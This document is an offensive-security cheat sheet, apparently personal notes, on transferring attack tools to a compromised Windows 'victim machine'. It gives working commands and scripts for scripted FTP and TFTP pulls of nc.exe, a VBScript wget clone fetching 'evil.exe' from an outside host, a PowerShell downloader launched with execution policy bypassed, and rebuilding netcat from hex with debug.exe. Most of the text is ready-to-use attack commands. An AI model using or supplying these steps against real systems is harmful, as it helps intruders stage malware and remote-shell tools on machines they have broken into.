Windows basics

Transferring files

Why is this so much harder in Windows? I don't know.

FTP

Even though many Windows versions have FTP clients, we can't use them interactively because it will kill shells. But we can run multiple commands from a file and download them from an FTP server like pure-ftpdon the attack machine.

On the victim machine, echo the following commands into a file:

echo open [attack machine]> ftp.txt
echo bob>> ftp.txt
echo bob>> ftp.txt
echo binary>> ftp.txt
echo GET nc.exe>> ftp.txt
echo bye>> ftp.txt

Then run this command to connect:

ftp -s:ftp.txt

TFTP

TFTP is installed by default on Windows XP and Windows 2003. Kali also has a TFTP server:

atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart

With this command you can serve files from /srv/tftp.

From a Windows machine, use this to transfer files:

tftp -i [host] get nc.exe

VBScript

Here is a good script to make a wget-clone in VB (may need to be piped through unix2dos before copying it):

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

To execute:

cscript wget.vbs http://[hoste]/evil.exe evil.exe

Powershell

Powershell can't be started in a non-interactive shell. But this script can start it:

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://[host]/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

To execute:

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Debug.exe

On windows 32 bit machines, it is possible to use debug.exe to transfer programs. It is used to inspect binaries, like a debugger, but can also rebuild them from hex. For example, a binary like nc.exe can be disassembled into hex, pasted into a file on the victim machine, and then assembled with debug.exe.

Debug.exe can only assemble 64 kb, use upx to compress the executable:

upx -9 nc.exe

To disassemble:

wine exe2bat.exe nc.exe nc.txt

Pasting that into the Windows shell will create nc.exe